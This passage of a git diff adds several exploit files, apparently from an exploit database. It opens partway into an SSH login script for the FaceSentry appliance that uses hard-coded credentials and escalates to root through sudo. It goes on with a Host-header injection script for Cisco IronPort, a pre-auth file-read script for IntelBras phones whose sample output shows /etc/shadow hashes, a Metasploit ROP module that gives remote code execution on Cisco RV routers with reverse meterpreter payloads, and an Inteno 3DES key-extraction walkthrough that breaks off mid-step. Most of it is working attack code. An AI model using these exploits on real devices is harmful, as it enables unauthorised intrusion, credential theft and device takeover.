+# while you're away from your Office and monitor all activity
+# via the web administration tool. Powered by standard PoE
+# (Power over Ethernet), FaceSEntry 5AN can be installed in
+# minutes with only 6 screws. FaceSentry 5AN is a true enterprise
+# grade access control or time-and-attendance appliance.
+#
+# Desc: FaceSentry facial biometric access control appliance
+# ships with hard-coded and weak credentials for SSH access
+# on port 23445 using the credentials wwwuser:123456. The root
+# privilege escalation is done by abusing the insecure sudoers
+# entry file.
+#
+# ================================================================
+# lqwrm@metalgear:~$ python ssh_root.py 192.168.11.1
+# [+] Connecting to 192.168.11.1 on port 23445: Done
+# [*] wwwuser@192.168.11.1:
+#     Distro    Ubuntu 16.04
+#     OS:       linux
+#     Arch:     Unknown
+#     Version:  4.10.0
+#     ASLR:     Enabled
+#     Note:     Susceptible to ASLR ulimit trick (CVE-2016-3672)
+# [+] Opening new channel: 'shell': Done
+# [*] Switching to interactive mode
+# wwwuser@TWR01:~$ pwd
+# /home/wwwuser
+# wwwuser@TWR01:~$ sudo -l 
+# Matching Defaults entries for wwwuser on localhost:
+# env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+#
+# User wwwuser may run the following commands on localhost:
+#     (root) NOPASSWD: /sbin/service, PROCESSES, NETWORKING, REBOOT, IPTABLES, /faceGuard/bin/*, /faceGuard/database/Restore*, /bin/date, /bin/cat, /bin/echo, /faceGuard/bin/phpbin/*, /bin/sed, /sbin/*, /usr/sbin/*, /bin/*, /usr/bin/*
+# wwwuser@TWR01:~$ sudo cat /etc/sudoers.d/sudoers.sentry
+# Cmnd_Alias SENTRY = /faceGuard/bin/*
+# Cmnd_Alias SENTRY_DB_RESTORE = /faceGuard/database/Restore*
+# Cmnd_Alias DATE = /bin/date
+# Cmnd_Alias CAT = /bin/cat
+# Cmnd_Alias ECHO = /bin/echo
+# Cmnd_Alias PRINTING = /usr/sbin/lpc, /usr/bin/lprm
+# Cmnd_Alias SENTRYWEB = /faceGuard/bin/phpbin/*
+# Cmnd_Alias SED = /bin/sed
+# Cmnd_Alias SERVICES = /sbin/service
+# Cmnd_Alias SBIN = /sbin/*, /usr/sbin/*
+# Cmnd_Alias BIN = /bin/*, /usr/bin/*
+#
+# wwwuser ALL=NOPASSWD: SERVICES, PROCESSES, NETWORKING, REBOOT, IPTABLES, SENTRY, SENTRY_DB_RESTORE, DATE, CAT, ECHO, SENTRYWEB, SED, SBIN, BIN
+# iwtuser ALL=NOPASSWD: SERVICES, PROCESSES, NETWORKING, REBOOT, IPTABLES, SENTRY, SENTRY_DB_RESTORE, DATE, CAT, ECHO, SENTRYWEB, SED, SBIN, BIN
+# wwwuser@TWR01:~$ id
+# uid=1001(wwwuser) gid=1001(wwwuser) groups=1001(wwwuser),27(sudo)
+# wwwuser@TWR01:~$ sudo su
+# root@TWR01:/home/wwwuser# id
+# uid=0(root) gid=0(root) groups=0(root)
+# root@TWR01:/home/wwwuser# exit
+# exit
+# wwwuser@TWR01:~$ exit
+# logout
+# [*] Got EOF while reading in interactive
+# [*] Closed SSH channel with 192.168.11.1
+# lqwrm@metalgear:~$
+# ================================================================
+#
+# Tested on: Linux 4.14.18-sunxi (armv7l) Ubuntu 16.04.4 LTS (Xenial Xerus)
+#            Linux 3.4.113-sun8i (armv7l)
+#            PHP/7.0.30-0ubuntu0.16.04.1
+#            PHP/7.0.22-0ubuntu0.16.04.1
+#            lighttpd/1.4.35
+#            Armbian 5.38
+#            Sunxi Linux (sun8i generation)
+#            Orange Pi PC +
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2019-5526
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5526.php
+#
+#
+# 28.05.2019
+#
+
+from pwn import *
+
+if len(sys.argv) < 2:
+    print 'Usage: ./fs.py <ip>\n'
+    sys.exit()
+
+ip = sys.argv[1]
+rshell = ssh('wwwuser', ip, password='123456', port=23445)
+rshell.interactive()
\ No newline at end of file
diff --git a/exploits/hardware/remote/47329.pl b/exploits/hardware/remote/47329.pl
new file mode 100755
index 000000000..62aa11c7e
--- /dev/null
+++ b/exploits/hardware/remote/47329.pl
@@ -0,0 +1,51 @@
+#!/usr/bin/perl -w
+#
+#
+#  Cisco (Titsco) Email Security Appliance (IronPort) C160 Header 'Host' Injection
+#
+#
+#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
+#
+#
+#  Disclaimer:
+#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
+#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
+#  caused by direct or indirect use of the  information or functionality provided by these programs. 
+#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
+#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
+#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
+#  responsibility.
+#   
+#  Use them at your own risk!
+#
+# 
+use strict;
+use HTTP::Request;
+use LWP::UserAgent;
+use WWW::UserAgent::Random;
+use HTTP::CookieJar::LWP;
+
+
+my $host = shift || 'https://192.168.1.1:443/';
+
+print ("[+] Cisco (Titsco) Email Security Appliance (IronPort) C160 Header 'Host' Injection\n");
+print ("===================================================================================\n");
+print ("[!] Author: Todor Donev <todor.donev\@gmail.com>\n");
+print ("[?] e.g. perl $0 https://target:port/\n") and exit if ($host !~ m/^http/);
+
+my $user_agent = rand_ua("browsers");
+my $jar = HTTP::CookieJar::LWP->new();
+my $browser  = LWP::UserAgent->new(
+                                        protocols_allowed => ['http', 'https'],
+                                        ssl_opts => { verify_hostname => 0 }
+                                );
+   $browser->timeout(10);
+   $browser->cookie_jar($jar);
+   $browser->agent($user_agent);
+
+my $request = HTTP::Request->new (POST => $host,
+                                  [ Content_Type => "application/x-www-form-urlencoded" ,
+                                    Referer => $host], " ");
+$request->header("Host" => "Header-Injection");
+my $content = $browser->request($request);
+print $content->headers_as_string();
\ No newline at end of file
diff --git a/exploits/hardware/remote/47337.pl b/exploits/hardware/remote/47337.pl
new file mode 100755
index 000000000..39924b200
--- /dev/null
+++ b/exploits/hardware/remote/47337.pl
@@ -0,0 +1,102 @@
+#!/usr/bin/perl -w
+#
+#  IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read
+#
+#  Todor Donev 2019 (c) <todor.donev at gmail.com>
+#
+#
+#  Disclaimer:
+#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
+#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
+#  caused by direct or indirect use of the  information or functionality provided by these programs. 
+#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
+#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
+#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
+#  responsibility.
+#   
+#  Use them at your own risk!
+#
+#  [test@localhost intelbras]$ perl intelbras_telefone_ip_tip_200_200_lite.pl 
+#
+#  # IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read
+#  # ========================================================================================================
+#  # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
+#  # ========================================================================================================
+#  # >  Authorization => Basic dXNlcjp1c2Vy
+#  # >  User-Agent => Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)
+#  # >  Content-Type => application/x-www-form-urlencoded
+#  # <  Accept-Ranges => bytes
+#  # <  Server => SIPPhone
+#  # <  Content-Type => text/html;charset=UTF-8
+#  # <  Expires => -1
+#  # <  Client-Date => Sun, 01 Sep 2019 13:37:00 GMT
+#  # <  Client-Peer => 192.168.1.1
+#  # <  Client-Response-Num => 1
+#  # ========================================================================================================
+#  root:$1$IJZx7biF$BgyHlA/AgR27VSEBALpqn1:11876:0:99999:7:::
+#  admin:$1$Bwt9zCNI$7rGLYt.wk.axE.6FUNFZe.:11876:0:99999:7:::
+#  guest:$1$A3lIJ0aO$Is8Ym.J/mpNejleongGft.:11876:0:99999:7:::
+#
+#  # ========================================================================================================
+#  [test@localhost intelbras]$ 
+# 
+#  Simple Mode:
+#  perl intelbras_telefone_ip_tip_200_200_lite.pl | grep -v "^#"
+#
+use strict;
+use v5.10;
+use HTTP::Request;
+use LWP::UserAgent;
+use WWW::UserAgent::Random;
+
+my $host = shift || '';
+my $file = shift || '/etc/shadow';
+my $user = shift || 'user';
+my $pass = shift || 'user';
+
+print "
+# IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 \'dumpConfigFile\' Pre-Auth Remote Arbitrary File Read
+# ========================================================================================================
+# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
+";
+if ($host !~ m/^http/){
+print  "# e.g. perl $0 https://target:port/ /etc/shadow user user
+# e.g. perl $0 https://target:port/ /phone/factory/user.ini user user
+# e.g. perl $0 https://target:port/ /phone/config/WebItemsLevel.cfg user user
+# e.g. perl $0 https://target:port/ /phone/config/.htpasswd user user
+";
+exit;
+}
+
+my $user_agent = rand_ua("browsers");
+my $browser  = LWP::UserAgent->new(
+                                        protocols_allowed => ['http', 'https'],
+                                        ssl_opts => { verify_hostname => 0 }
+                                );
+   $browser->timeout(10);
+   $browser->agent($user_agent);
+my $payload = $host."/cgi-bin/cgiServer.exx?command=dumpConfigFile(\"$file\")";
+my $request = HTTP::Request->new (GET => $payload,[ Content_Type => "application/x-www-form-urlencoded"], " ");
+$request->authorization_basic($user, $pass);
+print "# ========================================================================================================\n";
+my $response = $browser->request($request);
+say "# >  $_ => ", $request->header($_) for  $request->header_field_names;
+say "# <  $_ => ", $response->header($_) for  $response->header_field_names;
+print "# 401 Unauthorized! Wrong Username or Password!\n" and exit if ($response->code eq '401');
+print "# ========================================================================================================\n";
+
+if ($response->content =~ m/$file/g){
+
+        my $content = $response->content;
+        $content =~ s/$file//g;
+        $content =~ s/^\n+//;
+        print $content;
+        print "\n# ========================================================================================================\n";
+        exit;
+
+} else {
+
+        print "# Exploit failed or full path is wrong..\n";
+        exit;
+        
+}
\ No newline at end of file
diff --git a/exploits/hardware/remote/47348.rb b/exploits/hardware/remote/47348.rb
new file mode 100755
index 000000000..c10ee4b52
--- /dev/null
+++ b/exploits/hardware/remote/47348.rb
@@ -0,0 +1,423 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+# linux/armle/meterpreter/bind_tcp -> segfault
+# linux/armle/meterpreter/reverse_tcp -> segfault
+# linux/armle/meterpreter_reverse_http -> works
+# linux/armle/meterpreter_reverse_https -> works
+# linux/armle/meterpreter_reverse_tcp -> works
+# linux/armle/shell/bind_tcp -> segfault
+# linux/armle/shell/reverse_tcp -> segfault
+# linux/armle/shell_bind_tcp -> segfault
+# linux/armle/shell_reverse_tcp -> segfault
+#
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Deprecated
+
+  moved_from 'exploit/linux/http/cisco_rv130_rmi_rce'
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Cisco RV110W/RV130(W)/RV215W Routers Management Interface Remote Command Execution',
+      'Description'    => %q{
+        A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall,
+        Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router
+        could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.
+
+        The vulnerability is due to improper validation of user-supplied data in the web-based management interface.
+        An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.
+
+        A successful exploit could allow the attacker to execute arbitrary code on the underlying operating
+        system of the affected device as a high-privilege user.
+
+        RV110W Wireless-N VPN Firewall versions prior to 1.2.2.1 are affected.
+        RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.
+        RV215W Wireless-N VPN Router versions prior to 1.3.1.1 are affected.
+
+        Note: successful exploitation may not result in a session, and as such,
+         on_new_session will never repair the HTTP server, leading to a denial-of-service condition.
+      },
+      'Author'         =>
+        [
+          'Yu Zhang', # Initial discovery (GeekPwn conference)
+          'Haoliang Lu', # Initial discovery (GeekPwn conference)
+          'T. Shiomitsu', # Initial discovery (Pen Test Partners)
+          'Quentin Kaiser <kaiserquentin@gmail.com>' # Vulnerability analysis & exploit dev
+        ],
+      'License'         => MSF_LICENSE,
+      'Platform'        =>  %w[linux],
+      'Arch'            =>  [ARCH_ARMLE, ARCH_MIPSLE],
+      'SessionTypes'    =>  %w[meterpreter],
+      'CmdStagerFlavor' => %w{ wget },
+      'Privileged'      => true, # BusyBox
+      'References'      =>
+        [
+          ['CVE', '2019-1663'],
+          ['BID', '107185'],
+          ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex'],
+          ['URL', 'https://www.pentestpartners.com/security-blog/cisco-rv130-its-2019-but-yet-strcpy/']
+        ],
+      'DefaultOptions' => {
+          'WfsDelay' => 10,
+          'SSL' => true,
+          'RPORT' => 443,
+          'CMDSTAGER::FLAVOR' => 'wget',
+          'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
+       },
+      'Targets'        =>
+        [
+          [ 'Cisco RV110W 1.1.0.9',
+            {
+              'offset'              => 69,
+              'libc_base_addr'      => 0x2af06000,
+              'libcrypto_base_addr' => 0x2ac01000,
+              'system_offset'       => 0x00050d40,
+              'got_offset'          => 0x0009d560,
+              # gadget 1 is in /usr/lib/libcrypto.so
+              'gadget1'             => 0x00167c8c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
+              'Arch'                => ARCH_MIPSLE,
+              'DefaultOptions'  => {
+                'PAYLOAD'         => 'linux/mipsle/meterpreter_reverse_tcp',
+              }
+            }
+          ],
+          [ 'Cisco RV110W 1.2.0.9',
+            {
+              'offset'              => 69,
+              'libc_base_addr'      => 0x2af08000,
+              'libcrypto_base_addr' => 0x2ac03000,
+              'system_offset'       => 0x0004c7e0,
+              'got_offset'          => 0x00098db0,
+              # gadget 1 is in /usr/lib/libcrypto.so
+              'gadget1'             => 0x00167c4c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
+              'Arch'                => ARCH_MIPSLE,
+              'DefaultOptions'  => {
+                'PAYLOAD'         => 'linux/mipsle/meterpreter_reverse_tcp',
+              }
+            }
+          ],
+          [ 'Cisco RV110W 1.2.0.10',
+            {
+              'offset'              => 69,
+              'libc_base_addr'      => 0x2af09000,
+              'libcrypto_base_addr' => 0x2ac04000,
+              'system_offset'       => 0x0004c7e0,
+              'got_offset'          => 0x00098db0,
+              # gadget 1 is in /usr/lib/libcrypto.so
+              'gadget1'             => 0x00151fbc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
+              'Arch'                => ARCH_MIPSLE,
+              'DefaultOptions'  => {
+                'PAYLOAD'         => 'linux/mipsle/meterpreter_reverse_tcp',
+              }
+            }
+          ],
+          [ 'Cisco RV110W 1.2.1.4',
+            {
+              'offset'              => 69,
+              'libc_base_addr'      => 0x2af54000,
+              'libcrypto_base_addr' => 0x2ac4f000,
+              'system_offset'       => 0x0004c7e0,
+              'got_offset'          => 0x00098db0,
+              # gadget 1 is in /usr/lib/libcrypto.so
+              'gadget1'             => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
+              'Arch'                => ARCH_MIPSLE,
+              'DefaultOptions'  => {
+                'PAYLOAD'         => 'linux/mipsle/meterpreter_reverse_tcp',
+              }
+            }
+          ],
+          [ 'Cisco RV110W 1.2.1.7',
+            {
+              'offset'              => 69,
+              'libc_base_addr'      => 0x2af98000,
+              'libcrypto_base_addr' => 0x2ac4f000,
+              'system_offset'       => 0x0004c7e0,
+              'got_offset'          => 0x00098db0,
+              # gadget 1 is in /usr/lib/libcrypto.so
+              'gadget1'             => 0x0003e7dc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
+              'Arch'                => ARCH_MIPSLE,
+              'DefaultOptions'  => {
+                'PAYLOAD'         => 'linux/mipsle/meterpreter_reverse_tcp',
+              }
+            }
+          ],
+          [ 'Cisco RV130/RV130W < 1.0.3.45',
+            {
+              'offset'          => 446,
+              'libc_base_addr'  => 0x357fb000,
+              'system_offset'   => 0x0004d144,
+              'gadget1'         => 0x00020e79, # pop {r2, r6, pc};
+              'gadget2'         => 0x00041308, # mov r0, sp; blx r2;
+              'Arch'            => ARCH_ARMLE,
+              'DefaultOptions'  => {
+                'PAYLOAD'         => 'linux/armle/meterpreter_reverse_tcp',
+              }
+            },
+          ],
+          [ 'Cisco RV215W 1.1.0.5',
+            {
+              'offset'              => 69,
+              'libc_base_addr'      => 0x2af59000,
+              'libcrypto_base_addr' => 0x2ac54000,
+              'system_offset'       => 0x0004c7e0,
+              'got_offset'          => 0x00098db0,
+              # gadget 1 is in /usr/lib/libcrypto.so
+              'gadget1'             => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
+              'Arch'                => ARCH_MIPSLE,
+              'DefaultOptions'  => {
+                'PAYLOAD'         => 'linux/mipsle/meterpreter_reverse_tcp',
+              }
+            }
+          ],
+          [ 'Cisco RV215W 1.1.0.6',
+            {
+              'offset'              => 69,
+              'libc_base_addr'      => 0x2af59000,
+              'libcrypto_base_addr' => 0x2ac54000,
+              'system_offset'       => 0x0004c7e0,
+              'got_offset'          => 0x00098db0,
+              # gadget 1 is in /usr/lib/libcrypto.so
+              'gadget1'             => 0x00151fbc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
+              'Arch'                => ARCH_MIPSLE,
+              'DefaultOptions'  => {
+                'PAYLOAD'         => 'linux/mipsle/meterpreter_reverse_tcp',
+              }
+            }
+          ],
+          [ 'Cisco RV215W 1.2.0.14',
+            {
+              'offset'              => 69,
+              'libc_base_addr'      => 0x2af5f000,
+              'libcrypto_base_addr' => 0x2ac5a001,
+              'system_offset'       => 0x0004c7e0,
+              'got_offset'          => 0x00098db0,
+              # gadget 1 is in /usr/lib/libcrypto.so
+              'gadget1'             => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
+              'Arch'                => ARCH_MIPSLE,
+              'DefaultOptions'  => {
+                'PAYLOAD'         => 'linux/mipsle/meterpreter_reverse_tcp',
+              }
+            }
+          ],
+          [ 'Cisco RV215W 1.2.0.15',
+            {
+              'offset'              => 69,
+              'libc_base_addr'      => 0x2af5f000,
+              'libcrypto_base_addr' => 0x2ac5a000,
+              'system_offset'       => 0x0004c7e0,
+              'got_offset'          => 0x00098db0,
+              # gadget 1 is in /usr/lib/libcrypto.so
+              'gadget1'             => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
+              'Arch'                => ARCH_MIPSLE,
+              'DefaultOptions'  => {
+                'PAYLOAD'         => 'linux/mipsle/meterpreter_reverse_tcp',
+              }
+            }
+          ],
+          [ 'Cisco RV215W 1.3.0.7',
+            {
+              'offset'              => 77,
+              'libc_base_addr'      => 0x2afeb000,
+              'libcrypto_base_addr' => 0x2aca5000,
+              'system_offset'       => 0x0004c7e0,
+              'got_offset'          => 0x000a0530,
+              # gadget 1 is in /usr/lib/libcrypto.so
+              'gadget1'             => 0x00057bec, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
+              'Arch'                => ARCH_MIPSLE,
+              'DefaultOptions'  => {
+                'PAYLOAD'         => 'linux/mipsle/meterpreter_reverse_tcp',
+              }
+            }
+          ],
+          [ 'Cisco RV215W 1.3.0.8',
+            {
+              'offset'              => 77,
+              'libc_base_addr'      => 0x2afee000,
+              'libcrypto_base_addr' => 0x2aca5000,
+              'system_offset'       => 0x0004c7e0,
+              'got_offset'          => 0x000a0530,
+              # gadget 1 is in /usr/lib/libcrypto.so
+              'gadget1'             => 0x0003e7dc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
+              'Arch'                => ARCH_MIPSLE,
+              'DefaultOptions'  => {
+                'PAYLOAD'         => 'linux/mipsle/meterpreter_reverse_tcp',
+              }
+            }
+          ],
+        ],
+      'DisclosureDate'  => 'Feb 27 2019',
+      'DefaultTarget'   => 0,
+      'Notes' => {
+        'Stability'   => [ CRASH_SERVICE_DOWN, ],
+      },
+    ))
+  end
+
+  def p(lib, offset)
+    [(lib + offset).to_s(16)].pack('H*').reverse
+  end
+
+  def prepare_shellcode(cmd)
+    case target
+    # RV110W 1.1.0.9, 1.2.0.9, 1.2.0.10, 1.2.1.4, 1.2.1.7
+    # RV215W 1.1.0.5, 1.1.0.6, 1.2.0.14, 1.2.0.15, 1.3.0.7, 1.3.0.8
+    when targets[0], targets[1], targets[2], targets[3], targets[4], targets[6], targets[7], targets[8], targets[9], targets[10], targets[11]
+      shellcode = rand_text_alpha(target['offset']) +           # filler
+        rand_text_alpha(4) +                                    # $s0
+        rand_text_alpha(4) +                                    # $s1
+        rand_text_alpha(4) +                                    # $s2
+        rand_text_alpha(4) +                                    # $s3
+        p(target['libc_base_addr'], target['system_offset']) +  # $s4
+        rand_text_alpha(4) +                                    # $s5
+        rand_text_alpha(4) +                                    # $s6
+        rand_text_alpha(4) +                                    # $s7
+        rand_text_alpha(4) +                                    # $s8
+        p(target['libcrypto_base_addr'], target['gadget1']) +   # $ra
+        p(target['libc_base_addr'], target['got_offset']) +
+        rand_text_alpha(28) +
+        cmd
+      shellcode
+    when targets[5] # RV130/RV130W
+      shellcode = rand_text_alpha(target['offset']) +           # filler
+        p(target['libc_base_addr'], target['gadget1']) +
+        p(target['libc_base_addr'], target['system_offset']) +  # r2
+        rand_text_alpha(4) +                                    # r6
+        p(target['libc_base_addr'], target['gadget2']) +        # pc
+        cmd
+      shellcode
+    end
+  end
+
+  def send_request(buffer)
+    begin
+      send_request_cgi({
+        'uri'     => '/login.cgi',
+        'method'  => 'POST',
+        'vars_post' => {
+              "submit_button": "login",
+              "submit_type": "",
+              "gui_action": "",
+              "wait_time": 0,
+              "change_action": "",
+              "enc": 1,
+              "user": rand_text_alpha_lower(5),
+              "pwd": buffer,
+              "sel_lang": "EN"
+          }
+      })
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router")
+    end
+  end
+
+  def check
+
+    # We fingerprint devices using SHA1 hash of a web resource accessible to unauthenticated users.
+    # We use lang_pack/EN.js because it's the one file that changes the most between versions.
+    # Note that it's not a smoking gun given that some branches keep the exact same files in /www
+    # (see RV110 branch 1.2.1.x/1.2.2.x, RV130 > 1.0.3.22, RV215 1.2.0.x/1.3.x)
+
+    fingerprints = {
+      "69d906ddd59eb6755a7b9c4f46ea11cdaa47c706" => {
+        "version" => "Cisco RV110W 1.1.0.9",
+        "status" =>Exploit::CheckCode::Vulnerable
+      },
+      "8d3b677d870425198f7fae94d6cfe262551aa8bd" => {
+        "version" => "Cisco RV110W 1.2.0.9",
+        "status" => Exploit::CheckCode::Vulnerable
+      },
+      "134ee643ec877641030211193a43cc5e93c96a06" => {
+        "version" => "Cisco RV110W 1.2.0.10",
+        "status" => Exploit::CheckCode::Vulnerable
+      },
+      "e3b2ec9d099a3e3468f8437e5247723643ff830e" => {
+        "version" => "Cisco RV110W 1.2.1.4, 1.2.1.7, 1.2.2.1 (not vulnerable), 1.2.2.4 (not vulnerable)",
+        "status" => Exploit::CheckCode::Unknown
+      },
+      "6b7b1e8097e8dda26db27a09b8176b9c32b349b3" => {
+        "version" => "Cisco RV130/RV130W 1.0.0.21",
+        "status" => Exploit::CheckCode::Vulnerable
+      },
+      "9b1a87b752d11c5ba97dd80d6bae415532615266" => {
+        "version" => "Cisco RV130/RV130W 1.0.1.3",
+        "status" => Exploit::CheckCode::Vulnerable
+      },
+      "9b6399842ef69cf94409b65c4c61017c862b9d09" => {
+        "version" => "Cisco RV130/RV130W 1.0.2.7",
+        "status" => Exploit::CheckCode::Vulnerable
+      },
+      "8680ec6df4f8937acd3505a4dd36d40cb02c2bd6" => {
+        "version" => "Cisco RV130/RV130W 1.0.3.14, 1.0.3.16",
+        "status" => Exploit::CheckCode::Vulnerable
+      },
+      "8c8e05de96810a02344d96588c09b21c491ede2d" => {
+        "version" => "Cisco RV130/RV130W 1.0.3.22, 1.0.3.28, 1.0.3.44, 1.0.3.45 (not vulnerable), 1.0.3.51 (not vulnerable)",
+        "status" => Exploit::CheckCode::Unknown
+      },
+      "2f29a0dfa78063d643eb17388e27d3f804ff6765" => {
+        "version" => "Cisco RV215W 1.1.0.5",
+        "status" => Exploit::CheckCode::Vulnerable
+      },
+      "e5cc84d7c9c2d840af85d5f25cee33baffe3ca6f" => {
+        "version" => "Cisco RV215W 1.1.0.6",
+        "status" => Exploit::CheckCode::Vulnerable
+      },
+      "7cc8fcce5949a68c31641c38255e7f6ed31ff4db" => {
+        "version" => "Cisco RV215W 1.2.0.14 or 1.2.0.15",
+        "status" => Exploit::CheckCode::Vulnerable
+      },
+      "050d47ea944eaeadaec08945741e8e380f796741" => {
+        "version" => "Cisco RV215W 1.3.0.7 or 1.3.0.8, 1.3.1.1 (not vulnerable), 1.3.1.4 (not vulnerable)",
+        "status" => Exploit::CheckCode::Unknown
+      }
+    }
+
+    uri = target_uri.path
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(uri, 'lang_pack/EN.js')
+    })
+    if res && res.code == 200
+      fingerprint = Digest::SHA1.hexdigest("#{res.body.to_s}")
+      if fingerprints.key?(fingerprint)
+        print_good("Successfully identified device: #{fingerprints[fingerprint]["version"]}")
+        return fingerprints[fingerprint]["status"]
+      else
+        print_status("Couldn't reliably fingerprint the target.")
+      end
+    end
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    print_status('Sending request')
+    execute_cmdstager
+  end
+
+  def execute_command(cmd, opts = {})
+    shellcode = prepare_shellcode(cmd.to_s)
+    send_request(shellcode)
+  end
+
+  def on_new_session(session)
+    # Given there is no process continuation here, the httpd server will stop
+    # functioning properly and we need to take care of proper restart
+    # ourselves.
+    print_status("Reloading httpd service")
+    reload_httpd_service = "killall httpd && cd /www && httpd && httpd -S"
+    if session.type.to_s.eql? 'meterpreter'
+      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
+      session.sys.process.execute '/bin/sh', "-c \"#{reload_httpd_service}\""
+    else
+      session.shell_command(reload_httpd_service)
+    end
+  ensure
+    super
+  end
+end
\ No newline at end of file
diff --git a/exploits/hardware/remote/47390.txt b/exploits/hardware/remote/47390.txt
new file mode 100644
index 000000000..fdb5cbdbf
--- /dev/null
+++ b/exploits/hardware/remote/47390.txt
@@ -0,0 +1,96 @@
+# Exploit Title: Inteno IOPSYS Gateway 3DES Key Extraction - Improper Access Restrictions
+# Date: 2019-06-29
+# Exploit Author: Gerard Fuguet (gerard@fuguet.cat)
+# Vendor Homepage: https://www.intenogroup.com/
+# Version: EG200-WU7P1U_ADAMO3.16.4-190226_1650
+# Fixed Version: EG200-WU7P1U_ADAMO3.16.8-190820_0937
+# Affected Component: SIP password, Info Gathering of Network Config
+# Attack Type: Remote
+# Tested on: Kali Linux 2019.2 against an Inteno EG200 Router
+# CVE : CVE-2019-13140
+
+# Description:
+Inteno EG200 EG200-WU7P1U_ADAMO3.16.4-190226_1650 and before
+firmwares routers have a JUCI ACL misconfiguration that allows
+the "user" account to extract the 3DES key via JSON commands to ubus.
+The 3DES key is used to decrypt the provisioning file provided by
+Adamo Telecom on a public URL via cleartext HTTP.
+
+# Attack Vectors:
+To get success on the exploitation, two components are mandatory: 1.
+the encrypted file (.enc) and 2. The 3DES key for decrypt it. The
+encrypted file can be downloaded via HTTP URL offered by Adamo ISP
+(works from any external network). Then is need to interact with the
+router using WebSocket protocol to obtain the 3DES key, a web browser
+like Firefox can be used as WebSocket client under the developer
+tools. Session id is acquired with the same username and password of
+the router (in this case, password is the same as wifi defaults). Once
+3DES key is obtained through a JSON request command, .enc file can be
+decrypted with the help of openssl tool.
+
+# PoC:
+Step 1: Getting the provisioning file
+Download from http://inteno-provisioning.adamo.es/XXXXXXXXXXXX.enc
+Where XXXXXXXXXXXX is your router’s Inteno MAC, all in capitals and without
+the colons. You can also get your MAC by doing a ping to the router
+and then an arp command on terminal.
+Step 2: The 3DES Key
+Let's communcatie by Sockets
+- Using Firefox, open the router’s webpage (192.168.1.1 by default).
+- Invoke the developer tools by pressing F12 and go to the Console Tab.
+- Let’s create the WebSocket:
+var superSocket = new WebSocket("ws://192.168.1.1/", "ubus-json")
+- And creating the Log for show responses in each petition:
+superSocket.onmessage = function (event) {console.log(event.data)}
+- We request an ID session with the same login parameters that when access
+to the router’s website. (put your wifis router password instead of
+wifis-password value):
+superSocket.send(JSON.stringify({"jsonrpc":"2.0","method":"call","params":["00000000000000000000000000000000","session","login",{"username":"user","password":"wifis-password"}],"id":666}))
+- Now, you will obtain a response, the value of the parameter that says
+“ubus_rpc_session” refers to your session’s ID, copy it to use in the next
+request call.
+- Requesting information about the router’s System. (put your session ID
+instead of put-your-session-id-here value):
+superSocket.send(JSON.stringify({"jsonrpc":"2.0","method":"call","params":["put-your-session-id-here","router.system","info",{}],"id":999}))
+- On the response obtained, copy the value of the “des” parameter.
+It’s 16 digits that we need convert to hexadecimal.
+Step 3: Ready for Decrypting
+Convert to HEX using xxd tool where XXXXXXXXXXXXXXXX is your "des" key:
+echo -n XXXXXXXXXXXXXXXX | xxd -p
